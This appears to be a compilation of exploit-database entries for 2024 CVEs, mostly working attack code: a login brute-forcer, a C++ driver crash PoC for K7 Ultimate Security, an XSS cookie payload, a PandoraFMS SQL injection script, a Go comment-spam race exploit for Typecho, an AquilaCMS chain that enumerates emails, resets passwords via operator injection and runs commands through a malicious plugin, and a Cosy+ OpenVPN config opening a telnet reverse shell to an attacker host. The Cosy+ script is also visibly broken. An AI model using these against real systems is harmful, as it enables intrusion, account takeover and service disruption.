                print(colored('Brute forcing on Server: ', 'yellow') + colored(server, 'yellow') + colored(' Username: ', 'yellow') + colored(usr, 'yellow') + colored(' Password: ', 'yellow') + colored(password, 'yellow'))
                if r.status_code == 200:
                    print(colored('Credentials found: username: ', 'green') + colored(usr, 'green') + colored(' password: ', 'green') + colored(password, 'green') + colored(' server: ', 'green') + colored(server, 'green'))
                    print(colored('Token: ', 'cyan') + colored(r.content.decode(), 'cyan'))
                    print('\n')
                else:
                    print(colored('403 - Unauthenticated!', 'red'))
            except IndexError:
                print(colored('Something went wrong', 'red'))


if __name__ == '__main__':
    main()
K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS)
# Exploit Title: K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS) # Date: 13.08.2024 # Author: M. Akil Gündoğan # Vendor Homepage: https://k7computing.com/ # Version: < v17.0.2019 # Tested on: Windows 10 Pro x64 # CVE ID: CVE-2024-36424 # Vulnerability Description: -------------------------------------- In K7 Ultimate Security < v17.0.2019, the driver file (K7RKScan.sys - this version 15.1.0.7) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of a null pointer dereference from IOCtl 0x222010 and 0x222014. At the same time, the driver is accessible to all users in the "Everyone" group. # Technical details and step-by-step Proof of Concept (PoC): -------------------------------------- 1 - Install the driver in the path "C:\Program Files (x86)\K7 Computing\K7TSecurity\K7TSecurity\64Bit\K7RKScan.sys" to the system via OSRLoader or sc create. 2 - Compile the attached PoC code written in C++ as release on VS 2022. 3 - Run the compiled PoC directly with a double click. You will see the system crash/BSOD. # Impact: -------------------------------------- An attacker with unauthorized user access can cause the entire system to crash and terminate critical processes, including any antivirus process where the relevant driver is activated and used on the system. # Advisories: -------------------------------------- K7 Computing recommends that all customers update their products to the corresponding versions shown below: K7 Ultimate Security (17.0.2019 or Higher) # Timeline: -------------------------------------- - 16.05.2024 - Vulnerability reported. - 05.08.2024 - Vendor has fixed the vulnerability. - 13.08.2024 - Released. 
# References: --------------------------------------
- Vendor: https://www.k7computing.com
- Advisory: https://support.k7computing.com/index.php?/selfhelp/view-article/Advisory-issued-on-5th-aug-2024-417
- CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36424
- Repository: https://github.com/secunnix/CVE-2024-36424
# PoC Code (C++): -------------------------------------------------------------------------------------------------------------------------
/* # Usage: Only compile it and run, boooom :)
 *
 * Defender notes (review):
 * - The PoC opens the device \\.\DosK7RKScnDrv and issues one DeviceIoControl
 *   with a null input buffer of length 0 and no output buffer. A driver that
 *   dereferences the input buffer for IOCTL 0x222010 / 0x222014 without first
 *   checking the pointer and the supplied length crashes here; validating
 *   buffer length and pointer before use is the fix on the driver side.
 * - The advisory text on this page states the device is reachable by the
 *   "Everyone" group; restricting the device object's ACL to administrators
 *   would stop unprivileged callers from reaching the handler at all.
 * - Detection: a handle open on \\.\DosK7RKScnDrv from a process that is not
 *   part of the K7 product is unexpected. Mitigation per the vendor: update to
 *   17.0.2019 or higher.
 */
#include <windows.h>
#include <iostream>
// NOTE(review): std::wstring relies on <iostream> pulling in <string> transitively.

const std::wstring driverDevice = L"\\\\.\\DosK7RKScnDrv"; // K7RKScan.sys symbolic link path
const DWORD ioCTL = 0x222010; // IOCTL 0x222010 or 0x222014

/* Open the device, send the IOCTL once, close the handle.
 * Returns 1 if the device cannot be opened (prints GetLastError), else 0 —
 * a DeviceIoControl failure is printed but does not change the exit code. */
int main() {
    std::cout << "K7 Ultimae Security < v17.0.2019 K7RKScan.sys Null Pointer Dereference - PoC" << std::endl;
    HANDLE hDevice = CreateFile(driverDevice.c_str(), GENERIC_READ | GENERIC_WRITE, 0, nullptr, OPEN_EXISTING, 0, nullptr);
    if (hDevice == INVALID_HANDLE_VALUE) {
        std::cerr << "Failed, please load driver and check again. Exit... " << GetLastError() << std::endl;
        return 1;
    }
    void* inputBuffer = nullptr; // Null input buffer
    DWORD inputBufferSize = 0;
    DWORD bytesReturned;
    // No output buffer either (nullptr, 0); bytesReturned is left uninitialised until the call.
    BOOL result = DeviceIoControl(hDevice, ioCTL, inputBuffer, inputBufferSize, nullptr, 0, &bytesReturned, nullptr);
    if (!result) {
        std::cerr << "DeviceIoControl failed. Exit... " << GetLastError() << std::endl;
    }
    CloseHandle(hDevice);
    return 0;
}
CodeAstro Online Railway Reservation System 1.0 - Cross Site Scripting (XSS)
# Exploit Title: CodeAstro Online Railway Reservation System 1.0 - Cross Site Scripting (XSS) # Date: 2024-08-15 # Exploit Author: Raj Nandi # Vendor Homepage: https://codeastro.com/ # Software Link: https://codeastro.com/online-railway-reservation-system-in-php-with-source-code/ # Version: 1.0 # Tested on: Any OS # CVE: CVE-2024-7815 ## Description: A Cross-Site Scripting (XSS) vulnerability exists in [Application Name/Version]. This vulnerability allows an attacker to inject and execute arbitrary JavaScript code within the context of the user's browser session. ## Proof of Concept (PoC): 1. Navigate to [vulnerable page or input field]. 2. Input the following payload: `<script>alert(document.cookie)</script>` 3. Upon execution, the script will trigger and display the user's cookies in an alert box. ## Mitigation: To prevent this vulnerability, ensure that all user inputs are properly sanitized and validated before being reflected back on the webpage.
PandoraFMS 7.0NG.772 - SQL Injection
# Exploit Title: PandoraFMS 7.0NG.772 - SQL Injection
# Date: 21/11/2023
# Exploit Author: Osama Yousef
# Vendor Homepage: https://pandorafms.com/
# Software Link: https://github.com/pandorafms/pandorafms/releases/download/v772-LTS/pandorafms_agent_linux-7.0NG.772.tar.gz
# Version: v7.0NG.772
# Tested on: Linux
# CVE : CVE-2023-44088

# NOTE(review): this listing was collapsed onto a single line on the page; the
# block structure below is reconstructed from statement order, not from the
# original indentation.

import re, requests, argparse, string, random, base64
import urllib3
import html

# Browser-like request headers sent on every request of the session.
# 'Origin' and 'Referer' are filled in from --target in main().
headers = {
    'Cache-Control': 'max-age=0',
    'Origin': '',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36',
    'Accept': '*/*',
    'Referer': ''
}

def login(session: requests.Session, url: str, username: str, password: str) -> None:
    """Authenticate the session against the Pandora console.

    Fetches the login page, scrapes the CSRF token from it and POSTs the
    credentials to ``<url>?login=1``.

    Args:
        session: the ``requests.Session`` that keeps the login cookies.
        url: console base URL ending in ``pandora_console/``.
        username, password: credentials used for the login form.

    Exits the process with status 1 when the response says the user is blocked.

    NOTE(review): only the 'User is blocked' message is treated as a failure;
    a wrong password is not detected here, so exploit() is reached with an
    unauthenticated session in that case.
    """
    res = session.get(url)
    csrf = retrieve_csrftoken(res.text)
    url+= '?login=1'
    # Form-encoded body built by hand; username/password are not URL-escaped.
    payload = "nick={}&pass={}&login_button=Let%27s+go&csrf_code={}"
    res = session.post(url, data=payload.format(username, password, csrf), headers={'Content-Type': 'application/x-www-form-urlencoded'})
    if 'User is blocked' in res.text:
        print("Login Failed!")
        exit(1)

def exploit(session: requests.Session, url: str, imagepath: str, query: str) -> None:
    """Create a visual console whose background-image *filename* carries ``query``,
    then read the query result back out of the console's rendered properties.

    Flow visible in the code:
      1. POST the console form with a multipart ``background_image`` whose
         filename is ``<name>.jpg',(<query>),'1','1','1','1');-- helloo.jpg``
         (spaces replaced by tabs).
      2. Find the new console in the map builder list and open it.
      3. Extract the ``backgroundColor`` value from the ``var props = {...}``
         JavaScript in the page and print it as the query output.

    Args:
        session: authenticated session from login().
        url: console base URL ending in ``pandora_console/``.
        imagepath: path of a local file whose bytes are sent as the image body.
        query: SQL sub-expression that is placed inside the filename.

    Exits with status 1 if the console is not reported as created.

    Defender notes: the injected SQL travels in the multipart ``filename=``
    parameter of the ``background_image`` part, so a filename containing
    quotes, parentheses, ``;--`` or raw tab characters is the observable
    artefact in request logs. The urllib3 patch below turns ``%09`` back
    into tab bytes so the server receives raw tabs rather than the encoded
    form (presumably to get past a space-based filter; not verifiable here).
    """
    url1 = url + "?sec=network&sec2=godmode/reporting/visual_console_builder&tab=data"
    name = random_id(10)
    payload = "{}.jpg',({}),'1','1','1','1');-- helloo.jpg".format(name, query)
    payload=payload.replace(' ', '\t')
    # NOTE(review): the file handle from open() is never closed explicitly.
    files = {"background_image": (payload, open(imagepath, 'rb').read(), 'image/jpeg')}
    # Create a reference to the original _make_request method
    urllib3.connectionpool.HTTPConnectionPool._original_make_request = urllib3.connectionpool.HTTPConnectionPool._make_request
    # Replace the _make_request method with the custom_make_request function
    # NOTE(review): this patches a private urllib3 API; its signature differs
    # between urllib3 1.x and 2.x — confirm against the installed version.
    urllib3.connectionpool.HTTPConnectionPool._make_request = custom_make_request
    res = session.post(url1, files=files, data={'action':'save', 'name':name, 'id_group': 0, 'background_image': 'None.png', 'background_color': '#ffffff', 'width': '1024', 'height': '768', 'is_favourite_sent': '0', 'auto_adjust_sent': '0', 'update_layout': 'Save'})
    if 'Created successfully' not in res.text:
        print("Failed to create a visual console!")
        exit(1)
    url2 = url + "?sec=godmode/reporting/map_builder&sec2=godmode/reporting/map_builder"
    res = session.get(url2)
    # Locate the anchor that links to the console just created (greedy `.*`;
    # x is None and the next line raises AttributeError if nothing matches).
    x = re.search('(?:<a href=".*">)'+name, res.text)
    match = x.group()
    # NOTE(review): str.lstrip removes a *character set*, not a prefix; it
    # happens to stop at the `"` that follows `href=` because `"` is not in
    # the set.
    url3 = match.lstrip("<a href=")
    url3 = url3.split('"')[1]
    url3 = url3.split("?")[1]
    url3 = html.unescape(url3)
    url4 = url+ "?" + url3
    res = session.get(url4)
    # The query result is expected in the backgroundColor property of the
    # console's JS props object.
    x = re.search('(?:var props = {"autoAdjust":true,"backgroundColor":".*","backgroundImage")', res.text)
    match = x.group()
    # NOTE(review): same lstrip character-set issue — leading characters of the
    # result that appear in this prefix string (e.g. a, o, r, t, u, :) would be
    # stripped as well.
    output = match.lstrip('var props = {"autoAdjust":true,"backgroundColor":"')
    output = output.split('","backgroundImage')[0]
    print("Query output: {}".format(output))

def retrieve_csrftoken(response: str) -> str:
    """Return the ``csrf_code`` hidden-input value found in an HTML page.

    Args:
        response: HTML text of the login page.

    Returns:
        The token string (also printed to stdout).

    Raises:
        AttributeError: when the hidden input is not present (``x`` is None).

    NOTE(review): ``lstrip`` strips a character set, so a token whose first
    characters are letters contained in the prefix string (a, c, d, e, f, h,
    i, l, m, n, o, p, r, s, t, u, v, y) is truncated — the login would then
    fail on the CSRF check.
    """
    x = re.search('(?:<input id="hidden-csrf_code" name="csrf_code" type="hidden" value=")[a-zA-Z0-9]*(?:")', response)
    match = x.group()
    csrf = match.lstrip('<input id="hidden-csrf_code" name="csrf_code" type="hidden" value="').rstrip('"')
    print("CSRF: {}".format(csrf))
    return csrf

def random_id(len: int) -> str:
    """Return a random alphanumeric string of length ``len``.

    Uses ``random`` (not ``secrets``), which is fine here since the value is
    only a unique console name.

    NOTE(review): the parameter name shadows the builtin ``len``.
    """
    chars = string.ascii_uppercase + string.ascii_lowercase + string.digits
    return ''.join(random.choice(chars) for _ in range(len))

def custom_make_request(self, conn, method, url, timeout=urllib3.connectionpool._Default, chunked=False, **httplib_request_kw):
    """Replacement for ``HTTPConnectionPool._make_request``.

    Rewrites the outgoing request body, replacing every ``%09`` (the
    percent-encoded tab that ends up in the multipart filename) with three
    raw tab bytes, then delegates to the saved original method.

    Args mirror urllib3's ``_make_request``; ``httplib_request_kw['body']``
    is expected to be bytes (or falsy).
    """
    body = httplib_request_kw['body']
    if body:
        body = body.replace(b"%09", b"\t"*3)
        httplib_request_kw['body'] = body
    return self._original_make_request(conn, method, url, timeout=timeout, chunked=chunked, **httplib_request_kw)

def main() -> None:
    """Parse CLI arguments, build the session, log in and run exploit()."""
    ap = argparse.ArgumentParser()
    ap.add_argument("-t", "--target", required=True, help="Target URI")
    ap.add_argument("-u", "--username", required=True, help="Username")
    ap.add_argument("-p", "--password", required=True, help="Password")
    ap.add_argument("-i", "--image", required=True, help="Image path")
    ap.add_argument("-q", "--query", required=True, help="SQL Query to execute")
    ap.add_argument("-x", "--proxy", required=False, help="Proxy Configuration (e.g., http://127.0.0.1:8080/)")
    args = vars(ap.parse_args())
    session = requests.Session()
    url = args['target']
    # Normalise the target to the pandora_console/ base path.
    if 'pandora_console' not in url:
        if not url.endswith('/'):
            url += '/'
        url += 'pandora_console/'
    headers['Origin'] = args['target']
    headers['Referer'] = args['target']
    session.headers.update(headers)
    # Optional single proxy; scheme chosen by a substring test on the value.
    proxies = {}
    if args['proxy'] is not None:
        if 'https' in args['proxy']:
            proxies['https'] = args['proxy']
        else:
            proxies['http'] = args['proxy']
    session.proxies.update(proxies)
    login(session, url, args['username'], args['password'])
    exploit(session, url, args['image'], args['query'])

if __name__=='__main__':
    main()
Typecho 1.3.0 - Race Condition
# Exploit Title: Typecho 1.3.0 - Race Condition
# Google Dork: intext:"Powered by Typecho" inurl:/index.php
# Date: 18/08/2024
# Exploit Author: Michele 'cyberaz0r' Di Bonaventura
# Vendor Homepage: https://typecho.org
# Software Link: https://github.com/typecho/typecho
# Version: 1.3.0
# Tested on: Typecho 1.3.0 Docker Image with PHP 7.4 (https://hub.docker.com/r/joyqi/typecho)
# CVE: CVE-2024-35539
# For more information, visit the blog post: https://cyberaz0r.info/2024/08/typecho-multiple-vulnerabilities/

// NOTE(review): the "# ..." lines above are exploit-db metadata, not Go
// comments. This listing was also collapsed onto a single line on the page;
// the layout below is reconstructed from the brace structure.

package main

import (
	"bytes"
	"fmt"
	"io"
	"net/http"
	"net/url"
	"os"
	"strings"
	"sync"
	"sync/atomic"
	"time"

	"github.com/robertkrimen/otto"
)

var (
	// c counts comment POSTs that were answered with a 302 (treated as
	// accepted). It is never reset, so the per-wave report is cumulative.
	c int32 = 0
	// commentsPostInterval is the pause (seconds) between spam waves.
	commentsPostInterval int64 = 60
	// maxThreads caps the number of goroutines started per wave.
	maxThreads int = 1000
	wg         sync.WaitGroup
	userAgent  string = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
	// client does not follow redirects, so the 302 issued by the comment
	// endpoint is observable as the response status.
	client *http.Client = &http.Client{
		CheckRedirect: func(req *http.Request, via []*http.Request) error {
			return http.ErrUseLastResponse
		},
	}
)

// getJSFunction fetches u and returns the inline JavaScript function body found
// between "input.value = (" and ")();;" in the page — the client-side code that
// computes the comment form token. Returns "" on any error (after printing it).
//
// NOTE(review): resp.Body is never closed and the buf.ReadFrom error is ignored.
func getJSFunction(u string) string {
	req, err := http.NewRequest("GET", u, nil)
	if err != nil {
		fmt.Println("[X] Error creating initial request:", err)
		return ""
	}
	req.Header.Set("User-Agent", userAgent)
	resp, err := client.Do(req)
	if err != nil {
		fmt.Println("[X] Error sending initial request:", err)
		return ""
	}
	buf := new(bytes.Buffer)
	buf.ReadFrom(resp.Body)
	body := buf.String()
	if !strings.Contains(body, "input.value = (") || !strings.Contains(body, ")();;") {
		fmt.Println("[X] Error finding JavaScript function")
		return ""
	}
	jsFunction := strings.Split(body, "input.value = (")[1]
	jsFunction = strings.Split(jsFunction, ")();;")[0]
	return jsFunction
}

// executeJavaScript evaluates jsFunctionBody in an otto VM, calls the function
// named jsFunctionName with no receiver, and returns its result as a string.
// Returns "" on any error (after printing it).
func executeJavaScript(jsFunctionName string, jsFunctionBody string) string {
	vm := otto.New()
	_, err := vm.Run(jsFunctionBody)
	if err != nil {
		fmt.Println("[X] Error executing JavaScript function:", err)
		return ""
	}
	result, err := vm.Call(jsFunctionName, nil)
	if err != nil {
		fmt.Println("[X] Error calling JavaScript function:", err)
		return ""
	}
	returnValue, err := result.ToString()
	if err != nil {
		fmt.Println("[X] Error converting JavaScript result to string:", err)
		return ""
	}
	return returnValue
}

// spamComments runs forever: each wave waits until one second before the
// scheduled timestamp, then for roughly two seconds launches up to maxThreads
// concurrent spamRequest goroutines, waits for them, prints the running total
// and schedules the next wave commentsPostInterval seconds later.
//
// The premise (inferred from the 60-second interval and the burst) is a
// check-then-act window in the server's per-client comment interval check;
// the listing itself does not show the server side.
//
// NOTE(review): once i reaches maxThreads the inner loop spins without
// sleeping until the two-second window has elapsed.
//
// Defender notes: the observable pattern is a burst of hundreds of POSTs to
// the comment endpoint from one client within ~2 s, repeating about every
// minute; the authors are "user_<n>" and mails "user<n>@test.example".
// Mitigation is an interval check that is enforced atomically on the server
// (e.g. inside the same transaction as the insert) rather than check-then-insert.
func spamComments(u string, formToken string) {
	timestamp := time.Now().Unix()
	for {
		i := 0
		for time.Now().Unix() < timestamp-1 {
			time.Sleep(250 * time.Millisecond)
			fmt.Printf("\r[*] Waiting for next spam wave... (%d seconds) ", timestamp-time.Now().Unix()-1)
		}
		fmt.Printf("\n")
		for time.Now().Unix() < timestamp+2 {
			if i < maxThreads {
				wg.Add(1)
				go spamRequest(u, formToken, i)
				i++
			}
		}
		wg.Wait()
		fmt.Printf("\n[+] Successfully spammed %d comments\n", c)
		timestamp = time.Now().Unix() + commentsPostInterval
	}
}

// spamRequest posts one form-encoded comment to u+"comment" (u is therefore
// expected to end with "/") carrying the computed form token in "_" and
// per-request author/mail/text derived from i. A 302 response increments c.
// wg.Done is deferred, so every early return still releases the wait group.
func spamRequest(u string, formToken string, i int) {
	fmt.Printf("\r[*] Spamming comment request %d ", i)
	defer wg.Done()
	formData := url.Values{}
	formData.Set("_", formToken)
	formData.Set("author", fmt.Sprintf("user_%d", i))
	formData.Set("mail", fmt.Sprintf("user%d@test.example", i))
	formData.Set("text", fmt.Sprintf("Hello from user_%d", i))
	req, err := http.NewRequest("POST", u+"comment", nil)
	if err != nil {
		return
	}
	req.Header.Set("Referer", u)
	req.Header.Set("User-Agent", userAgent)
	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
	req.Header.Set("Content-Length", fmt.Sprint(len(formData.Encode())))
	// Body is attached after construction; Content-Length was set by hand above.
	req.Body = io.NopCloser(strings.NewReader(formData.Encode()))
	resp, err := client.Do(req)
	if err != nil {
		return
	}
	if resp.StatusCode == 302 {
		atomic.AddInt32(&c, 1)
	}
	defer resp.Body.Close()
}

// main reads the post URL from argv, extracts and evaluates the form-token
// function (renamed to calculateToken so it can be called by name), then
// starts the spam loop.
//
// NOTE(review): the usage string names CVE-2024-35538.go while the banner and
// the header say CVE-2024-35539.
func main() {
	if len(os.Args) != 2 {
		fmt.Println("Usage: go run CVE-2024-35538.go <POST_URL>")
		return
	}
	fmt.Println("[+] Starting Typecho <= 1.3.0 Race Condition exploit (CVE-2024-35539) by cyberaz0r")
	targetUrl := os.Args[1]
	fmt.Println("[+] Spam target:", targetUrl)
	fmt.Println("[*] Getting JavaScript function to calculate form token...")
	jsFunction := getJSFunction(targetUrl)
	if jsFunction == "" {
		fmt.Println("[-] Could not get JavaScript function, exiting...")
		return
	}
	fmt.Println("[*] Evaluating JavaScript function to calculate form token...")
	formToken := executeJavaScript("calculateToken", strings.Replace(jsFunction, "function ()", "function calculateToken()", 1))
	if formToken == "" {
		fmt.Println("[-] Could not get form token, exiting...")
		return
	}
	fmt.Printf("[+] Form token: %s", formToken)
	spamComments(targetUrl, formToken)
}
Cosy+ firmware 21.2s7 - Command Injection
# Exploit Title: Cosy+ firmware 21.2s7 - Command Injection # Google Dork: N/A # Date: 2024-8-20 # Exploit Author: CodeB0ss # Contact: t.me/codeb0ss / uncodeboss@gmail.com # Version: 21.2s7 # Tested on: Windows 11 Home Edition # CVE: CVE-2024-33896 import socket import subprocess import time def configcreator(file_path): with open(file_path, 'w') as f: f.write( """ client dev tun persist-tun proto tcp verb 5 mute 20 --up '/bin/sh -c "TF=$(mktemp -u);mkfifo $TF;telnet {attacker_ip} 5000 0<$TF | sh 1>$TF"' script-security 2 """) def l3st(port): server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_socket.bind(('0.0.0.0', port)) server_socket.listen(1) print(f" - --> Listening_0n_port {port}") client_socket, _ = server_socket.accept() print(" - --> Recevied") while True: data = client_socket.recv(1024) if not data: break print(data.decode()) client_socket.close() server_socket.close() if name == "main": IP = '127.0.0.1' config = '/path/to/malicious_config.ovpn' port = 5000 listener_process = subprocess.Popen(['python', '-c', f'from main import start_listener; start_listener({port})']) time.sleep(2) create_malicious_openvpn_config(config) print(f" - --> config_created {config}") GitHub: https://github.com/codeb0ss/CVE-2024-33896-PoC Hey, Overview: The Ewon Cosy+ is a VPN gateway used for remote access and maintenance in industrial environments. The manufacturer describes the product as follows (see [1]): "The Ewon Cosy+ gateway establishes a secure VPN connection between the machine (PLC, HMI, or other devices) and the remote engineer. The connection happens through Talk2m, a highly secured industrial cloud service. The Ewon Cosy+ makes industrial remote access easy and secure like never before!" Due to improper neutralization of parameters read from a user-controlled configuration file, an authenticated attacker is able to inject and execute OS commands on the device. 
Vulnerability Details: Authenticated attackers are able to upload a custom OpenVPN configuration. This configuration can contain the OpenVPN parameters "--up" and "--down", which execute a specified script or executable. Since the OpenVPN process itself runs with the highest privileges (root), this allows the device to be completely compromised.
AquilaCMS 1.409.20 - Remote Command Execution (RCE)
# Exploit Title: AquilaCMS 1.409.20 - Remote Command Execution (RCE)
# Date: 2024-10-25
# Exploit Author: Eui Chul Chung
# Vendor Homepage: https://www.aquila-cms.com/
# Software Link: https://github.com/AquilaCMS/AquilaCMS
# Version: v1.409.20
# CVE: CVE-2024-48572, CVE-2024-48573

# NOTE(review): this listing was collapsed onto a single line on the page; the
# block structure (and the line breaks inside the JavaScript template in
# create_plugin) are reconstructed, not original.

import io
import json
import uuid
import string
import zipfile
import argparse
import requests
import textwrap


def unescape_special_characters(email: str) -> str:
    """Turn the bracket-escaped regex metacharacters used during enumeration
    (``[$]``, ``[*]``, ``[.]`` ...) back into the literal characters, for display.
    """
    return (
        email.replace("[$]", "$")
        .replace("[*]", "*")
        .replace("[+]", "+")
        .replace("[-]", "-")
        .replace("[.]", ".")
        .replace("[?]", "?")
        .replace(r"[\^]", "^")
        .replace("[|]", "|")
    )


def get_user_emails() -> list[str]:
    """Enumerate registered e-mail addresses one character at a time.

    Sends ``PUT {args.url}/api/v2/user`` with ``{"email": "^<prefix><ch>.*"}``
    for every candidate character and treats the response code
    ``UserAlreadyExist`` as "a user matching this pattern exists". The ``^``
    anchor, the ``.*`` suffix and the bracket-escaping of metacharacters
    show that the ``email`` value is being evaluated as a regular
    expression by the server. A prefix that no character extends is a
    complete address and is collected.

    Returns:
        The addresses found, still in bracket-escaped form (use
        unescape_special_characters() to display them).

    Defender notes: the request pattern is a large number of PUT requests to
    /api/v2/user whose ``email`` starts with ``^`` and ends with ``.*``; the
    mitigation is to match e-mail addresses as literal strings (or reject
    non-string / regex-typed values) rather than passing them to a regex
    query.
    """
    valid_characters = list(
        string.ascii_lowercase + string.digits + "!#%&'/=@_`{}~"
    ) + ["[$]", "[*]", "[+]", "[-]", "[.]", "[?]", r"[\^]", "[|]"]
    emails_found = []
    next_emails = ["^"]
    while next_emails:
        prev_emails = next_emails
        next_emails = []
        for email in prev_emails:
            found = False
            for ch in valid_characters:
                data = {"email": f"{email + ch}.*"}
                res = requests.put(f"{args.url}/api/v2/user", json=data)
                if json.loads(res.text)["code"] == "UserAlreadyExist":
                    next_emails.append(email + ch)
                    found = True
            if not found:
                # No extension matched: the prefix (minus the '^' anchor) is a full address.
                emails_found.append(email[1:])
                print(f"[+] {unescape_special_characters(email[1:])}")
    return emails_found


def reset_password(email: str) -> None:
    """Request a password reset for ``email`` and then complete it without the
    token, by sending ``{"token": {"$ne": None}, "password": ...}``.

    The second body's ``token`` is a query-operator object rather than a
    string, which is the operator-injection indicator in this request.

    Defender notes: reject non-string ``token`` values at the API boundary
    (schema validation) and log reset requests whose ``token`` is an object.
    """
    data = {"email": email}
    requests.post(f"{args.url}/api/v2/user/resetpassword", json=data)
    data = {"token": {"$ne": None}, "password": args.password}
    requests.post(f"{args.url}/api/v2/user/resetpassword", json=data)
    print(f"[+] {unescape_special_characters(email)} : {args.password}")


def get_admin_auth_token(emails: list[str]) -> str | None:
    """Try ``args.password`` against the admin login for each address and return
    the ``data`` field of the first 200 response, or None if none succeed.
    """
    for email in emails:
        data = {"username": email, "password": args.password}
        res = requests.post(f"{args.url}/api/v2/auth/login/admin", json=data)
        if res.status_code == 200:
            print(f"[+] Administrator account : {unescape_special_characters(email)}")
            return json.loads(res.text)["data"]
    return None


def create_plugin(plugin_name: str) -> io.BytesIO:
    """Build an in-memory zip containing a minimal plugin.

    The archive holds ``package.json``, ``info.json`` and ``uninit.js``; the
    latter runs ``args.command`` via ``child_process.exec`` when the plugin
    is deactivated or deleted (per the comment in the template).

    Args:
        plugin_name: directory name inside the archive and the package name.

    Returns:
        A ``BytesIO`` positioned at offset 0 holding the zip bytes.
    """
    payload = textwrap.dedent(
        f"""
        const {{ exec }} = require("child_process");

        /**
         * This function is called when the plugin is desactivated or when we delete it
         */
        module.exports = async function (resolve, reject) {{
            try {{
                exec("{args.command}");
                return resolve();
            }} catch (error) {{}}
        }};
        """
    ).strip()
    plugin = io.BytesIO()
    with zipfile.ZipFile(plugin, "a", zipfile.ZIP_DEFLATED, False) as zip_file:
        zip_file.writestr(
            f"{plugin_name}/package.json",
            io.BytesIO(f'{{ "name": "{plugin_name}" }}'.encode()).getvalue(),
        )
        zip_file.writestr(
            f"{plugin_name}/info.json", io.BytesIO(b'{ "info": {} }').getvalue()
        )
        zip_file.writestr(
            f"{plugin_name}/uninit.js", io.BytesIO(payload.encode()).getvalue()
        )
    plugin.seek(0)
    return plugin


def rce(emails: list[str]) -> None:
    """Upload the plugin with an admin token, look it up by name, then toggle it
    inactive so that its ``uninit.js`` runs on the server.

    Steps visible in the code: login via get_admin_auth_token(); POST
    /api/v2/modules/upload (multipart ``file``); POST /api/v2/modules with
    ``{"PostBody": {"limit": 0}}`` to list modules; POST /api/v2/modules/toggle
    with ``active: False``. A 200 on the toggle is reported as success.

    Defender notes: an upload to /modules/upload followed within seconds by a
    /modules/toggle for the same module id, from a freshly reset admin
    account, is the sequence to alert on; plugin lifecycle hooks executing
    arbitrary JS at deactivate time are the capability being abused.
    """
    auth_token = get_admin_auth_token(emails)
    if auth_token is None:
        print("[-] Administrator account not found")
        return
    print("[+] Create malicious plugin")
    plugin_name = uuid.uuid4().hex
    plugin = create_plugin(plugin_name)
    print("[+] Upload plugin")
    headers = {"Authorization": auth_token}
    files = {"file": (f"{plugin_name}.zip", plugin, "application/zip")}
    requests.post(f"{args.url}/api/v2/modules/upload", headers=headers, files=files)
    print("[+] Find uploaded plugin")
    headers = {"Authorization": auth_token}
    data = {"PostBody": {"limit": 0}}
    res = requests.post(f"{args.url}/api/v2/modules", headers=headers, json=data)
    plugin_id = None
    # `data` is reused as the loop variable here; it no longer holds the request body.
    for data in json.loads(res.text)["datas"]:
        if data["name"] == plugin_name:
            plugin_id = data["_id"]
            print(f"[+] Plugin ID : {plugin_id}")
            break
    if plugin_id is None:
        print("[-] Plugin not found")
        return
    print("[+] Deactivate plugin")
    headers = {"Authorization": auth_token}
    data = {"idModule": plugin_id, "active": False}
    res = requests.post(f"{args.url}/api/v2/modules/toggle", headers=headers, json=data)
    if res.status_code == 200:
        print("[+] Command execution succeeded")
    else:
        print("[-] Command execution failed")


def main() -> None:
    """Enumerate addresses, reset every password to ``args.password``, then rce()."""
    print("[*] Retrieve email addresses")
    emails = get_user_emails()
    print("\n[*] Reset password")
    for email in emails:
        reset_password(email)
    print("\n[*] Perform remote code execution")
    rce(emails)


if __name__ == "__main__":
    # `args` is a module-level name read by the functions above; it only exists
    # when the file is run as a script.
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "-u",
        dest="url",
        help="Site URL (e.g. www.aquila-cms.com)",
        type=str,
        required=True,
    )
    parser.add_argument(
        "-p",
        dest="password",
        help="Password to use for password reset (e.g. HaXX0r3d!)",
        type=str,
        default="HaXX0r3d!",
    )
    parser.add_argument(
        "-c",
        dest="command",
        help="Command to execute (e.g. touch /tmp/pwned)",
        type=str,
        default="touch /tmp/pwned",
    )
    args = parser.parse_args()
    main()
Typecho 1.3.0 - Stored Cross-Site Scripting (XSS)
# Exploit Title: Typecho 1.3.0 - Stored Cross-Site Scripting (XSS)
# Google Dork: intext:"Powered by Typecho" inurl:/index.php
# Date: 18/08/2024
# Exploit Author: Michele 'cyberaz0r' Di Bonaventura
# Vendor Homepage: https://typecho.org
# Software Link: https://github.com/typecho/typecho
# Version: 1.3.0
# Tested on: Typecho 1.3.0 Docker Image with PHP 7.4 (https://hub.docker.com/r/joyqi/typecho)
# CVE: CVE-2024-35540
# For more information, visit the blog post: https://cyberaz0r.info/2024/08/typecho-multiple-vulnerabilities/

// NOTE(review): the "# ..." lines above are exploit-db metadata, not Go
// comments. This listing was collapsed onto a single line on the page; the
// layout below, including the line breaks inside the raw-string templates in
// getJsCode, is reconstructed.

package main

import (
	"bufio"
	"bytes"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"fmt"
	"net/http"
	"net/url"
	"os"
	"strings"
	"time"
)

var (
	postTitle string = "Reflected XSS PoC"
	postText  string = "Hey admin! Look at the draft of this blog post, can I publish it?"
	userAgent string = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
	// client does not follow redirects so createPost can read the Location header.
	client *http.Client = &http.Client{
		CheckRedirect: func(req *http.Request, via []*http.Request) error {
			return http.ErrUseLastResponse
		},
	}
)

// getEditUrl loads /admin/write-post.php with the supplied Cookie header and
// returns the first <form action="..."> value on the page (the post-save URL,
// which carries the CSRF token). Returns "" on any error (after printing it).
//
// NOTE(review): resp.Body is never closed and the buf.ReadFrom error is ignored.
func getEditUrl(u string, cookies string) string {
